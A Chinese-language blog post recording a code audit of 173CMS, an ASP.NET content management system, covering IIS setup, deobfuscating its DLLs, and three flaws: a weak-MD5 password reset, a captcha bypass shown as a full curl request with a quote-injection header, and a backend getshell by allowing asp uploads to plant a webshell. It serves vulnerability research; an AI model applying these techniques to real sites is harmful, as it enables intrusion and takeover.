ASP.NET CMS预编译dll审计小记(173CMS) 2019-04-10 02:30:08 Steven Xeldax ### 173CMS环境安装搭建 这里选择了朋友给的173cms练手,下载好CMS  需要将WebSite文件夹下的所有内容复制到服务器上  随后配置IIS,添加网站映射  服务器默认IIS是没有任何开发环境支持的,需要手动安装asp和.net环境的iis支持。  在部署好服务器运行的时候可能会出现如下报错 > ASP.NET IIS System.UnauthorizedAccessException: 对路径“C:\.....”的访问被拒绝。(转) 需要在应用程序池选中网站进入高级设置并修改进程模型中的标识为LocalSystem。   ### 反编译dll 直接用dnspy反编译会发现全是混淆的,看的非常费力。 在朋友的提醒下意识到了有反混淆的工具存在,de4dot。 工具地址: > https://github.com/0xd4d/de4dot 可以使用这个将程序反编译回来 ### 漏洞审计 #### 1.前台用户密码重置漏洞 弱MD5检验  #### 2.失效的验证码验证 ``` curl 'http://localhost:51218/register.aspx' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Origin: http://localhost:51218' -H 'Upgra lication/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3' -H 'Referer: http://localhost:51218/register.aspx' -H 'REMOTE_ADDR:1%27' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: zh-CN,zh;q=0.9' -H 'Cookie: ASP.NET_SessionId=ag4bke55dtpt4suogbaduz55; Hm_lvt_8a626e78f107ee53730e3ec6c43df0a8=1554865724; bdshare_firstime=1554865724451; R26PFHV8N4_adminid=DF7nnV8koN6ox1nw5mc7ew==; R26PFHV8N4_adminusername=hipjDfgaKOQXgCckPUNwTw==; R26PFHV8N4_pagesize=1W6XRUi0vzJ66xnRXPSS4Q==; R26PFHV8N4_webgroup_id=DF7nnV8koN6ox1nw5mc7ew==; R26PFHV8N4_language_id=DF7nnV8koN6ox1nw5mc7ew==; Hm_lpvt_8a626e78f107ee53730e3ec6c43df0a8=1554889882' --data 'redirect=&username=test123456&safeemail=t123456est%4011.com&password=111111&surepassword=111111&verifycode=48ZHJ&agree=1' --compressed ``` #### 3.后台getshell 由于后台可以修改上传文件后缀,因此只要加上asp后缀就可以利用上传功能上传webshell。
